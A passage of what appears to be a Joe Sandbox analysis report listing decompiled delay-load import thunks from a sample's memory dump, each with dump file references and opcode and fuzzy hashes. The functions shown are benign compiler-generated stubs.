Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA7A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA7A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae44, 0xc01178); // executed
				goto __eax;
			}

0x00bbda84
0x00bbda8c
0x00bbda93

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA8C

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cbeb8035b41ddc772a4f72eeffc3bc9eb54610e789b509f9cf8c7e1c3ebebb48
Instruction ID: dd19eb41e1ecb3adae0ef00ac47a16b344d4c0b45c1e276310010256cd0b05a1
Opcode Fuzzy Hash: cbeb8035b41ddc772a4f72eeffc3bc9eb54610e789b509f9cf8c7e1c3ebebb48
Instruction Fuzzy Hash: 52B012D135D1037F324862105C0BC7A42ACC0C0B1033483EBBA00C0190B5C84C408032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA70 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA70() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae24, 0xc01078); // executed
				goto __eax;
			}

0x00bbda23
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5bcee4e4553ee1e2729ead39a942d50eb4120677349ca40a086261fc666bc1ed
Instruction ID: 9cca23cc1ab45656766edbcc788ce246e7b70743440e3b875b279157cabc4fc7
Opcode Fuzzy Hash: 5bcee4e4553ee1e2729ead39a942d50eb4120677349ca40a086261fc666bc1ed
Instruction Fuzzy Hash: CDB012C166D9016F334473155C06D7682CCC0C5B10334C3FFB540C0190F4C80C848032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA66 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA66() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae24, 0xc0107c); // executed
				goto __eax;
			}

0x00bbda23
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c56e6cc3fe417753e9ec9f871d4397e14c7fc07cea9d7393c9b019c3484962b3
Instruction ID: eed856b362dd4747d63f7422241b0ed19204a779771677d297f95facfc0b7540
Opcode Fuzzy Hash: c56e6cc3fe417753e9ec9f871d4397e14c7fc07cea9d7393c9b019c3484962b3
Instruction Fuzzy Hash: B8B012C566D802AF314473155D02D7683CCC1C9B10334C2FFB940C0190F4C80C408032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA52 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBDA52() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdae24, 0xc01084); // executed
				goto __eax;
			}

0x00bbda23
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7ab9240a51c689456c248cccefb358c1bcfd392bccd744a18382b01f16399fef
Instruction ID: 9ee3492e98075e323b3576ede0e412c360c26cce173bdb81ad40937e93ce05cd
Opcode Fuzzy Hash: 7ab9240a51c689456c248cccefb358c1bcfd392bccd744a18382b01f16399fef
Instruction Fuzzy Hash: 7EB012C126D8426F314473151D02EB682CCC0C5B10334C1FFB680C0190F8C80C418032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD6E7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD6E7() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01168); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 33b381caf3b5c5e07120e78bf1fa66a65026d96ddb9cbe63bb6ab6c1aa6d4b86
Instruction ID: 4e0c33bcdfc245455149250fb241f12a66a3aecf76d66446cce7c1d2199e5681
Opcode Fuzzy Hash: 33b381caf3b5c5e07120e78bf1fa66a65026d96ddb9cbe63bb6ab6c1aa6d4b86
Instruction Fuzzy Hash: CEB012D52593027E3A8822105C82C7B428CC4D0B5133481FBB501C00A0F8CC0C408037

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD798 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD798() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01124); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0be2fe7afa3723e3c9644994183ee22381ba8b4c17ffd2ab1efcd01ae356145c
Instruction ID: b19095ab352655d63a9b0040adfd397212ab859094f0202ffa4091ca35651cf9
Opcode Fuzzy Hash: 0be2fe7afa3723e3c9644994183ee22381ba8b4c17ffd2ab1efcd01ae356145c
Instruction Fuzzy Hash: BCB012E12590016E318862145D02DBA42DCC4D0B1133480FBF605C05A0F4CC0C114133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD784 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD784() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc0112c); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 46fe62fb892fd081b13e0eeb7db6a1b830830a5ade8ff1d1d74e61614c4efa17
Instruction ID: 0f62d45b97a9e76840b0bc1fe1bf341929a977b9e230e5fa32c8087416bc9a81
Opcode Fuzzy Hash: 46fe62fb892fd081b13e0eeb7db6a1b830830a5ade8ff1d1d74e61614c4efa17
Instruction Fuzzy Hash: 5BB012D52590016E318862245C02E7E42DCC4D0B11334C0FBFB05C01A0F4CC0C104133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7CA Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD7CA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01110); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4cceee6ea5fb0d90859625709859ed294cef9b4670ceb063366797d17030026d
Instruction ID: 30538c79dd93b434ff24b04f6ed1e32635a97f69779f7e7494bb1302f91f9677
Opcode Fuzzy Hash: 4cceee6ea5fb0d90859625709859ed294cef9b4670ceb063366797d17030026d
Instruction Fuzzy Hash: 16B012D12590016E318862145C03D7A82CCC4D4F6133484FBB505C01E0F4CC0C404133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD73E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD73E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01148); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8545bf53d3d1baf5cce16907d39f7222a4bd8a4e69f86fb529d6a11a53c8f1b5
Instruction ID: 33688eb4fcbd3c0185884f7ed360fdc56e1e99766939be3ebfc3805de8e46909
Opcode Fuzzy Hash: 8545bf53d3d1baf5cce16907d39f7222a4bd8a4e69f86fb529d6a11a53c8f1b5
Instruction Fuzzy Hash: BDB012E12591016F32C862555C02D7A42CCC4D0F1133481FBB506C01A0F4CC0C404133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD734 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD734() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc0114c); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bcb60bae49e3caca590953a2b92c4fd85a7486fa304d0e5ea0a7f6578f69897a
Instruction ID: 3bd64c1ec1753408b9c733fdde9cab26a891602e73537fa046c66994d63c53c3
Opcode Fuzzy Hash: bcb60bae49e3caca590953a2b92c4fd85a7486fa304d0e5ea0a7f6578f69897a
Instruction Fuzzy Hash: 08B012E525A0016F328862155C02E7A42CCC4D0F11334C0FBB906C01A0F4CC0C004133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD720 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD720() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01154); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8492a083afc4931774d989b30ded279b2de3cd5ec02f7bfdad002d13d655ecc1
Instruction ID: bc1b3bdd01c65cbdd5d45e92854f3b4443fe9cdcfa66f53ff9be45261e5e8094
Opcode Fuzzy Hash: 8492a083afc4931774d989b30ded279b2de3cd5ec02f7bfdad002d13d655ecc1
Instruction Fuzzy Hash: D7B012D1259001AE328862145D02DBA42CCC4D0B11334D0FBF505C06A0F4CC0C494133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD716 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD716() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc01158); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 92725b96d97a91d0417dc6a8d9be29dc1126955cec2111fd440ba1a0e1ac77c1
Instruction ID: 8bf3c88b7187fa0e25f7633a1ce52b7198d5c672744773b531358d0ba2ea6e69
Opcode Fuzzy Hash: 92725b96d97a91d0417dc6a8d9be29dc1126955cec2111fd440ba1a0e1ac77c1
Instruction Fuzzy Hash: F7B012D1259101AE33C862155C02D7A42CCC4D0B11334D1FBF505C02A0F4CC0C444133

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD70C Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD70C() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc0115c); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
